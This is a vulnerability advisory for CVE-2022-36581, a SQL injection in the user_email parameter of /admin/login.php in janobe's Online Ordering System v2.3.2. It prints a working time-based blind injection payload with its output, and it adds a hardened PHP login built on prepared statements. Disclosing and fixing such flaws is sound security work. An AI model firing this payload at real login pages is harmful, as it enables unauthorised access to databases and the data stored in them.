CVE-2022-36581: Zerrr0_Vulnerability/SQL-Injection-Vulnerability.md at main · zerrr0/Zerrr0_Vulnerability

Online Ordering System v2.3.2 was discovered to contain a SQL injection vulnerability via the user_email parameter at /admin/login.php.

Online Ordering System By janobe - SQL injection vulnerability

  • Exploit Author: zerrr0

Vendor Homepage

  • https://www.sourcecodester.com/php/12978/online-ordering-system-phpmysqli.html

Description

  • Because the user_email parameter in Online Ordering System By janobe v2.3.2 (/admin/login.php) is used without protection, it can be abused to inject SQL queries and extract information from the database.
  • Vulnerability file: /admin/login.php
  • Parameter: user_email

Proof of Concept (PoC):

---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user_email=admin' AND (SELECT 5888 FROM (SELECT(SLEEP(5)))eEFG) AND 'BaRZ'='BaRZ&user_pass=admin&btnLogin=
---
  • current database: multistoredb
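As an added example (not the janobe project's own code), the following shows how the login check in /admin/login.php can be written with a prepared statement so that user_email can no longer alter the query. The table name `users`, its columns, the `$conn` handle and the use of password_hash() digests are assumptions for illustration.

```php
<?php
// Added example, not code from the Online Ordering System project.
// Assumes: an open mysqli connection in $conn, a hypothetical table `users`
// with columns user_id, user_email and user_pass (a password_hash() digest),
// and session_start() already called. get_result() needs the mysqlnd driver.

function authenticate(mysqli $conn, string $email, string $password): ?array
{
    // The pattern the advisory describes splices the POST value into the SQL text:
    //   $sql = "SELECT * FROM users WHERE user_email='$email' AND user_pass='$password'";
    // so a quote in user_email ends the literal and the rest is parsed as SQL.
    //
    // Hardened form: the statement text is fixed at prepare() time and the value
    // is sent separately as a bound parameter, so it cannot change the query structure.
    $stmt = $conn->prepare(
        'SELECT user_id, user_pass FROM users WHERE user_email = ? LIMIT 1'
    );
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // Verify against a stored hash rather than comparing a plaintext column in SQL.
    // The same failure path is used for "no such user" and "wrong password".
    if ($row === null || !password_verify($password, $row['user_pass'])) {
        return null;
    }
    return ['user_id' => (int) $row['user_id']];
}

// Usage at the top of /admin/login.php (field names taken from the advisory's PoC).
if (isset($_POST['btnLogin'])) {
    $user = authenticate(
        $conn,
        (string) ($_POST['user_email'] ?? ''),
        (string) ($_POST['user_pass'] ?? '')
    );
    if ($user === null) {
        http_response_code(401);
        exit('Invalid credentials.');
    }
    session_regenerate_id(true);      // prevent session fixation on privilege change
    $_SESSION['user_id'] = $user['user_id'];
    header('Location: index.php');
    exit;
}
```

With the bound parameter in place, the time-based payload from the PoC is matched literally against user_email and the SLEEP() call never reaches the parser, which is also a quick way to confirm the fix: the login response time should no longer vary with the input.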
